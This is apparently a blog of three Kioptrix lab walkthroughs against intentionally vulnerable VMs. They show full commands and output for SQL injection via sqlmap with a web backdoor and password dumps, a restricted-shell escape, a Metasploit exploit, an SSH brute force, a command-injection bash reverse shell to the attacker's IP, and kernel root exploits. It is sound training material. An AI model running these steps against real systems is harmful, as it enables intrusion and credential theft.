Monday, May 12, 2014

Kioptrix Series: Challenge 4

1. Find the VM: I am running Kali and the K4 VM both on the NAT interface. My Kali VM has gotten a DHCP address of 172.16.32.132 so I scan the entire Class C network:
# nmap -P0 172.16.32.1-255
I see a system running SSH, HTTP, NETBIOS and Microsoft-DS at 172.16.32.136:
Nmap scan report for 172.16.32.136
Host is up (0.00062s latency).
Not shown: 566 closed ports, 430 filtered ports
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 00:0C:29:3C:9F:68 (VMware)

2. Get a detailed scan of K3:
# nmap -A 172.16.32.136
3. Browsing with a web browser to our target, we find a login page. Let’s look at the data being sent with a web proxy:
·      Applications >> Kali Linux >> Web Applications >> Web Application Proxies >> owasp-zap
·      Click the à button to capture all outgoing requests
·      In Iceweasel: Edit >> Preferences >> Advanced >> Network >> Settings…
Select “Manual proxy configuration” and set the HTTP Proxy for 127.0.0.1, port 8080. This will locally proxy all our web traffic through ZAP which will give us a better look at the data.
·      On the target login page, input ‘admin’ and ‘pass’ in the appropriate fields
ZAP will break on the request and show the following data:

·      Pressing the play button will allow the request to continue. You can also capture the return data by clicking the  ← button.
4. Let’s see if that data is injectable. We’ll inject on the password parameter:
# sqlmap -u http://172.16.32.136/checklogin.php
--data='myusername=admin&mypassword=pass&Submit=Login' -p 'mypassword' --level=5
--risk=3 --batch

Looks like that parameter is indeed injectable. Let's see if we can get a shell:
# sqlmap -u http://172.16.32.136/checklogin.php --data='myusername=admin&mypassword=pass&Submit=Login' -p 'mypassword' --level=5
--risk=3 --os-shell

    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 16:45:30

[16:45:30] [INFO] resuming back-end DBMS 'mysql'
[16:45:30] [INFO] testing connection to the target URL
[16:45:30] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: mypassword
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: myusername=admin&mypassword=-2255' OR (2963=2963) AND 'IlKu'='IlKu&Submit=Login

    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: myusername=admin&mypassword=pass' AND 4203=BENCHMARK(5000000,MD5(0x53624d61)) AND 'SNSY'='SNSY&Submit=Login
---
[16:45:30] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL 5
[16:45:30] [INFO] going to use a web backdoor for command prompt
[16:45:30] [INFO] fingerprinting the back-end DBMS operating system
[16:45:30] [INFO] the back-end DBMS operating system is Linux
which web application language does the web server support?
[1] ASP
[2] ASPX
[3] JSP
[4] PHP (default)
> 4
[16:45:36] [WARNING] unable to retrieve automatically the web server document root
what do you want to use for web server document root?
[1] common location(s) '/var/www/' (default)
[2] custom location
[3] custom directory list file
[4] brute force search

> 1
[16:45:38] [INFO] retrieved web server full paths: '/var/www/checklogin.php'
[16:45:38] [INFO] trying to upload the file stager on '/var/www' via LIMIT INTO OUTFILE technique
[16:45:38] [INFO] the file stager has been successfully uploaded on '/var/www' - http://172.16.32.136:80/tmpubyld.php
[16:45:38] [WARNING] unable to upload the file through the web file stager to '/var/www'
[16:45:38] [WARNING] backdoor has not been successfully uploaded through the file stager possibly because the user running the web server process has not write privileges over the folder where the user running the DBMS process was able to upload the file stager or because the DBMS and web server sit on different servers
do you want to try the same method used for the file stager? [Y/n]
[16:45:41] [INFO] the backdoor has been successfully uploaded on '/var/www' - http://172.16.32.136:80/tmpbnhin.php
[16:45:41] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER

os-shell> id
do you want to retrieve the command standard output? [Y/n/a] a
command standard output:    'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
os-shell> uname -a
command standard output:    'Linux Kioptrix4 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 GNU/Linux'

That kernel version looks familiar. A Google search for exploit linux 2.6.24-24 and we find http://blog.harux.com/2012/04/exploit-local-root-linux-kernel-2426.html. Let’s see if we can download the exploit it mentions:
os-shell> wget http://downloads.securityfocus.com/vulnerabilities/exploits/36038-6.c

Hmmm, it doesn’t look like the file wrote. We have write permissions, so we appear to be having trouble with local firewall rules. Let's see what else sqlmap can get us:
# sqlmap -u http://172.16.32.136/checklogin.php
--data='myusername=admin&mypassword=pass&Submit=Login' -p 'mypassword' --level=5
 --risk=3 --dump --passwords --current-db

    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 17:33:11

[17:33:11] [INFO] resuming back-end DBMS 'mysql'
[17:33:11] [INFO] testing connection to the target URL
[17:33:11] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: mypassword
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: myusername=admin&mypassword=-2255' OR (2963=2963) AND 'IlKu'='IlKu&Submit=Login

    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: myusername=admin&mypassword=pass' AND 4203=BENCHMARK(5000000,MD5(0x53624d61)) AND 'SNSY'='SNSY&Submit=Login
---
[17:33:11] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL 5
[17:33:11] [INFO] fetching current database
[17:33:11] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[17:33:11] [INFO] retrieved:
sqlmap got a 302 redirect to 'http://172.16.32.136:80/login_success.php'. Do you want to follow? [Y/n]
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [y/N]
members
current database:    'members'
[17:33:18] [INFO] fetching database users password hashes
[17:33:18] [INFO] fetching database users
[17:33:18] [INFO] fetching number of database users
[17:33:18] [INFO] retrieved: 6
[17:33:18] [INFO] retrieved: 'root'@'localhost'
[17:33:20] [INFO] retrieved: 'root'@'Kioptrix4'
[17:33:22] [INFO] retrieved: 'root'@'127.0.0.1'
[17:33:23] [INFO] retrieved: 'debian-sys-maint'@'localhost'
[17:33:26] [INFO] retrieved: ''@'localhost'
[17:33:28] [INFO] retrieved: ''@'Kioptrix4'
[17:33:29] [INFO] fetching number of password hashes for user 'root'
[17:33:29] [INFO] retrieved: 1
[17:33:29] [INFO] fetching password hashes for user 'root'
[17:33:29] [INFO] retrieved:
[17:33:29] [INFO] retrieved:
[17:33:30] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based payloads

[17:33:30] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[17:33:30] [INFO] fetching number of password hashes for user 'debian-sys-maint'
[17:33:30] [INFO] retrieved: 1
[17:33:30] [INFO] fetching password hashes for user 'debian-sys-maint'
[17:33:30] [INFO] retrieved: *3AC38ADE5482EA4DE628D0D43BF8FA41E3CF3879
[17:33:33] [INFO] fetching number of password hashes for user ''
[17:33:33] [INFO] retrieved: 1
[17:33:33] [INFO] fetching password hashes for user ''
[17:33:33] [INFO] retrieved:
[17:33:33] [INFO] retrieved:
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N]
do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q]
[17:33:38] [INFO] using hash method 'mysql_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/txt/wordlist.zip' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
>
[17:33:40] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N]
[17:33:41] [INFO] starting dictionary-based cracking (mysql_passwd)
[17:33:41] [INFO] starting 2 processes
[17:33:56] [WARNING] no clear password(s) found                                                    
database management system users password hashes:
[*]  [1]:
    password hash: NULL
[*] debian-sys-maint [1]:
    password hash: *3AC38ADE5482EA4DE628D0D43BF8FA41E3CF3879
[*] root [1]:
    password hash: NULL

[17:33:56] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[17:33:56] [INFO] fetching current database
[17:33:56] [INFO] fetching tables for database: 'members'
[17:33:56] [INFO] fetching number of tables for database 'members'
[17:33:56] [INFO] retrieved: 1
[17:33:56] [INFO] retrieved: members
[17:33:57] [INFO] fetching columns for table 'members' in database 'members'
[17:33:57] [INFO] retrieved: 3
[17:33:57] [INFO] retrieved: id
[17:33:58] [INFO] retrieved: username
[17:33:58] [INFO] retrieved: password
[17:33:59] [INFO] fetching entries for table 'members' in database 'members'
[17:33:59] [INFO] fetching number of entries for table 'members' in database 'members'
[17:33:59] [INFO] retrieved: 2
[17:33:59] [INFO] retrieved: 1
[17:34:00] [INFO] retrieved: MyNameIsJohn
[17:34:01] [INFO] retrieved: john
[17:34:01] [INFO] retrieved: 2
[17:34:01] [INFO] retrieved: ADGAdsafdfwt4gadfga==
[17:34:03] [INFO] retrieved: robert
[17:34:04] [INFO] analyzing table dump for possible password hashes
Database: members
Table: members
[2 entries]
+----+----------+-----------------------+
| id | username | password              |
+----+----------+-----------------------+
| 1  | john     | MyNameIsJohn          |
| 2  | robert   | ADGAdsafdfwt4gadfga== |
+----+----------+-----------------------+

[17:34:04] [INFO] table 'members.members' dumped to CSV file '/usr/share/sqlmap/output/172.16.32.136/dump/members/members.csv'
[17:34:04] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/172.16.32.136'

[*] shutting down at 17:34:04

We’ve got some passwords!

7. SSH login as john shows we're in some kind of limited shell. Let's use the sqlmap PHP shell as the webserver to see what kind of shell it is:
os-shell> cat /etc/passwd
command standard output:
---
root:x:0:0:root:/root:/bin/bash
< - - snip - - >
john:x:1001:1001:,,,:/home/john:/bin/kshell
robert:x:1002:1002:,,,:/home/robert:/bin/kshell
os-shell> kshell --version
command standard output:    'lshell-0.9.12 - Limited Shell'

Google shows us that a vulnerability exists: http://www.aldeid.com/wiki/Lshell. Let’s bypass this restricted shell:

$ echo os.system('/bin/bash')

Now we've got a normal bash shell. Let's try and get that exploit now. We know we are getting blocked by firewall rules so let's not use the network to move the files. Let's copy and paste! Since compiling an exploit on the victim is not always easiest, let's compile it locally.
# gcc 36038-6.c -o exploit

Since it would be rather difficult to copy and paste a binary, we'll use base64:
base64 exploit

Copy the base64 data from one terminal to another. I pasted the data into a file on the victim (using vim, nano, etc) and then converted the data back:
$ base64 -d exploit.b64 > exploit
$ ./exploit
# whoami
root
# id
uid=0(root) gid=0(root) groups=1002(robert)

Finished! Now go back and see how else you could have gotten root; there’s more than one way!

Kioptrix Series: Challenge 3

1. Find the VM: I am running Kali and the K3 VM both on the NAT interface. My Kali VM has gotten a DHCP address of 172.16.32.132 so I scan the entire Class C network:
# nmap -P0 172.16.32.1-255
I see a system running SSH and HTTP at 172.16.32.135 (you may want to edit /etc/hosts to map that IP address to kioptrix3.com):
Nmap scan report for 172.16.32.135
Host is up (0.00063s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:B0:52:F2 (VMware)

2. Get a detailed scan of K3:
# nmap -A 172.16.32.135
3. Run a vulnerability scan:
·      Applications >> Kali Linux >> System Services >> OpenVas >> openvas start
·      In a Terminal, start the web interface: # gsad
·      Open a browser and navigate to https://localhost
·      Login with the password you created in setup (username is admin)
·      Configuration >> Targets
·      Click the star icon (New Target)
·      Fill in the details (Name: K3, Hosts: <IP address of K3>)
·      Create Target
·      Scan Management >> New Task
·      Fill in the details (Name: K3, Scan Targets: K3)
·      Create Task
·      Click the play button under Actions (Start)
·      While you're waiting, click the magnifier (Details) and then again at the next page to look at the results as they come in

4. OpenVas shows there are vulnerabilities in LotusCMS 3.0 which is being used to login at http://kioptrix3.com/index.php?system=Admin. Let’s use Metasploit to exploit this vulnerability:
# msfconsole
msf > search lotuscms
msf > use exploit/multi/http/lcms_php_exec
msf > show options
msf > set RHOST kioptrix3.com
msf > set URI /index.php?system=Admin
msf > show payloads
msf > set PAYLOAD php/meterpreter/bind_tcp
msf > exploit
meterpreter > shell
Process 4825 created.
Channel 0 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
pwd
/home/www/kioptrix3.com
cd /tmp
ls -ld /tmp
drwxrwxrwt 4 root root 4096 Sep 21 09:48 /tmp
uname -a
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 GNU/Linux

5. First, let’s see if this kernel is vulnerable:
Google exploit for linux 2.6.24-24 to find http://blog.harux.com/2012/04/exploit-local-root-linux-kernel-2426.html:
wget http://downloads.securityfocus.com/vulnerabilities/exploits/36038-6.c
gcc 36038-6.c -o exploit
./exploit
mmap: Permission denied

Okay, that didn’t work. Let try something else.
6. Let’s look at the users available on the system
cat /etc/passwd
We target user loneferret.
7. Applications >> Kali Linux >> Password Attacks >> Online Attacks >> hydra-gtk
Single Target: kioptrix3.com
Port: 22
Protocol: ssh
Username: loneferret
Password List: /usr/share/wordlists/metasploit/burnett_top_500.txt
Start

After a few seconds you should have guessed loneferret’s password. Let's login as loneferret via ssh:
# ssh loneferret@kioptrix3.com
We attempt to sudo to root but we get the error "Sorry, user loneferret is not allowed to execute '/bin/su' as root on Kioptrix3." So what can loneferret execute as root?
8. We see in loneferret's home directory a README about an editor called ht that apparently can be used with sudo. This editor uses ALT to access the various menu items so disable these in your Gnome Terminal: Edit >> Keyboard Shortcuts. Uncheck both "Enable menu acccess keys" and Enable the menu shortcut key.
Let's change /etc/sudoers to allow all commands to use sudo:
sudo ht /etc/sudoers
Change loneferret ALL=NOPASSWD: !/usr/bin/su, /usr/local/bin/ht
to loneferret ALL=NOPASSWD:ALL
Hint: the F1 - F10 keys map to the bottom options while ALT+F, ALT+E, etc. map to the top options.
Save and close the file.
sudo su
Win!

Monday, March 31, 2014

Kioptrix Series: Challenge 2


1. Find the VM: I am running Kali and the K2 VM both on the NAT interface. My Kali VM has gotten a DHCP address of 172.16.32.132 so I scan the entire Class C network:
# nmap -P0 172.16.32.1-255
I see a system running SSH, HTTP, HTTPS, RPCBIND, MYSQL, etc. at 172.16.32.134:
Nmap scan report for 172.16.32.134
Host is up (0.00058s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
111/tcp  open  rpcbind
443/tcp  open  https
631/tcp  open  ipp
3306/tcp open  mysql
MAC Address: 00:0C:29:E3:A6:03 (VMware)

2. Get a detailed scan of K2:
# nmap -A 172.16.32.134
3. Run a vulnerability scan:
·      Applications >> Kali Linux >> System Services >> OpenVas >> openvas start
·      In a Terminal, start the web interface: # gsad
·      Open a browser and navigate to https://localhost
·      Login with the password you created in setup (username is admin)
·      Configuration >> Targets
·      Click the star icon (New Target)
·      Fill in the details (Name: K2, Hosts: <IP address of K2>)
·      Create Target
·      Scan Management >> New Task
·      Fill in the details (Name: K2, Scan Targets: K2)
·      Create Task
·      Click the play button under Actions (Start)
·      While you're waiting, click the magnifier (Details) and then again at the next page to look at the results as they come in

4. Once the scan is complete, you'll see lots of PHP vulnerabilities but nothing remote. We’ll keep looking.
5. Let's look at the web server. We do a scan with nikto:
# nikto -h 172.16.32.133
Not much to use here. Continuing on…

6. Browsing with a web browser to our target, we find a login page. Let’s look at the data being sent with a web proxy:
·      Applications >> Kali Linux >> Web Applications >> Web Application Proxies >> owasp-zap
·      Click the à button to capture all outgoing requests
·      In Iceweasel: Edit >> Preferences >> Advanced >> Network >> Settings…
Select “Manual proxy configuration” and set the HTTP Proxy for 127.0.0.1, port 8080. This will locally proxy all our web traffic through ZAP which will give us a better look at the data.
·      On the target login page, input ‘admin’ and ‘pass’ in the appropriate fields
ZAP will break on the request and show the following data:

·      Pressing the play button will allow the request to continue. You can also capture the return data by clicking the ß button.
7. ZAP has showed us the format of the HTTP POST data being sent, now we can use some previous knowledge to gain access to the target. Looking at the nmap output we notice that MYSQL is running on the system. Let’s see if we can do some checks for SQL injection.
Most likely, the PHP page is submitting the data as a SQL query as something like this:
$query = "SELECT * FROM users WHERE username = '$uname' AND password='$psw'";
The expected input:
$query = "SELECT * FROM users WHERE username = 'admin' AND password='pass'";
Our SQL injection input:
$query = "SELECT * FROM users WHERE username = 'admin' AND password='' OR 1=1 -- -'";

This SQL injection statement will return true and allow login because we first close the single quote, follow it with a 1 equals 1 (which is always true) and the “-- -“ comments out the rest of the query.
Using this injection gives us access to an administrative tool that allows us to ping.
8. Since we know SQL injection is possible on that HTTP POST data, let’s look at using an awesome tool that automates SQL injection: sqlmap.
# sqlmap -h
First we put the link in a format that sqlmap wants: http://172.16.32.134/index.php?=1
Then we give it the HTTP POST data to inject into, we use the maximum level and risk values (5 and 3, respectively), and tell sqlmap to get the password hashes if it can inject.
# sqlmap -u http://172.16.32.134/index.php?=1 --data="uname=admin&psw=pass&btnLogin=Login" --level=5 --risk=3 --passwords

[*] starting at 22:00:29

[22:00:29] [INFO] testing connection to the target URL
[22:00:29] [INFO] testing if the target URL is stable. This can take a couple of seconds
[22:00:31] [INFO] target URL is stable
[22:00:31] [INFO] testing if POST parameter 'uname' is dynamic
<--snip-->
[22:01:03] [INFO] testing MySQL
[22:01:03] [INFO] confirming MySQL
[22:01:03] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 4.9
web application technology: PHP 4.3.9, Apache 2.0.52
back-end DBMS: MySQL < 5.0.0
[22:01:03] [INFO] fetching database users password hashes
[22:01:03] [INFO] fetching database users
[22:01:03] [INFO] fetching number of database users
[22:01:03] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[22:01:03] [INFO] retrieved: 3
[22:01:03] [INFO] retrieved:
[22:01:03] [INFO] retrieved:
[22:01:03] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based payloads

[22:01:03] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[22:01:03] [INFO] retrieved: john
[22:01:03] [INFO] retrieved: root
[22:01:04] [INFO] fetching number of password hashes for user 'john'
[22:01:04] [INFO] retrieved: 1
[22:01:04] [INFO] fetching password hashes for user 'john'
[22:01:04] [INFO] retrieved: 5a6914ba69e02807
[22:01:05] [INFO] fetching number of password hashes for user 'root'
[22:01:05] [INFO] retrieved: 1
[22:01:05] [INFO] fetching password hashes for user 'root'
[22:01:05] [INFO] retrieved: 5a6914ba69e02807
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N]
do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q]
[22:01:15] [INFO] using hash method 'mysql_old_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/txt/wordlist.zip' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[22:01:20] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N]
[22:01:25] [INFO] starting dictionary-based cracking (mysql_old_passwd)
[22:01:25] [INFO] starting 2 processes
[22:01:37] [INFO] cracked password 'hiroshima' for user 'john'                                    
database management system users password hashes:                                                 
[*] john [1]:
    password hash: 5a6914ba69e02807
    clear-text password: hiroshima
[*] root [1]:
    password hash: 5a6914ba69e02807
    clear-text password: hiroshima

[22:01:42] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/172.16.32.134'

[*] shutting down at 22:01:42

9. Play around with sqlmap and see what other data you can recover. We could probably use those usernames and passwords to remotely login to the MYSQL database, but let’s take a closer look at that administrative ping page. This is a classic case of command injection. Looking at the source for the page, we see the page is calling another PHP file: pingit.php. When we submit a command, the results are written to the pingit.php file. Let’s see what happens when we input the following:
localhost; whoami; id
PING localhost.localdomain (127.0.0.1) 56(84) bytes of data.
64 bytes from localhost.localdomain (127.0.0.1): icmp_seq=0 ttl=64 time=0.022 ms
64 bytes from localhost.localdomain (127.0.0.1): icmp_seq=1 ttl=64 time=0.049 ms
64 bytes from localhost.localdomain (127.0.0.1): icmp_seq=2 ttl=64 time=0.050 ms

--- localhost.localdomain ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 1999ms
rtt min/avg/max/mdev = 0.022/0.040/0.050/0.014 ms, pipe 2
apache
uid=48(apache) gid=48(apache) groups=48(apache)

So now we know the command is being run by user apache. Go ahead and see what happens when you run other commands like ls and find.
10. Now let's see if we can have it send us back a shell. First we need a listener:
# nc -l -p 4444
Now we input a command into the administrative page to give us a reverse shell. Take a pick from here and see what works: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
localhost; bash -i >& /dev/tcp/172.16.32.132/4444 0>&1
Success!
11. Now we just need root. Let's look at the kernel version:
$ uname -a
Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 athlon i386 GNU/Linux

A Google search for "2.6.9-55 exploit" reveals an exploit for the ip_append_data(). Let's look in ExploitDB for that one:
# searchsploit ip_append_data
Linux Kernel 2.6 < 2.6.19 (32bit) ip_append_data() ring0 Root Exploit       /linux/local/9542.c

Let's copy that up to the victim:
# cp /usr/share/exploitdb/platforms/linux/local/9542.c /var/www/ip_append_data.c
# chmod 777 /var/www/ip_append_data.c
# service apache2 start

On the victim shell:
$ wget http://172.16.32.132/ip_append_data.c
--19:32:20--  http://172.16.32.132/ip_append_data.c
           => `ip_append_data.c'
Connecting to 172.16.32.132:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2,645 (2.6K) [text/x-csrc]
ip_append_data.c: Permission denied

Cannot write to `ip_append_data.c' (Permission denied).

Ok, we don't have permissions to write there. Let's try /tmp (it's usually world writable):
$ cd /tmp
$ wget http://172.16.32.132/ip_append_data.c
--19:34:00--  http://172.16.32.132/ip_append_data.c
           => `ip_append_data.c.1'
Connecting to 172.16.32.132:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2,645 (2.6K) [text/x-csrc]

    0K ..                                                    100%  280.27 MB/s

19:34:00 (280.27 MB/s) - `ip_append_data.c.1' saved [2645/2645]

Success! Let's compile and run:
$ gcc ip_append_data.c -o exploit
$ ./exploit
sh: no job control in this shell
# whoami
root
# id
uid=0(root) gid=0(root) groups=48(apache)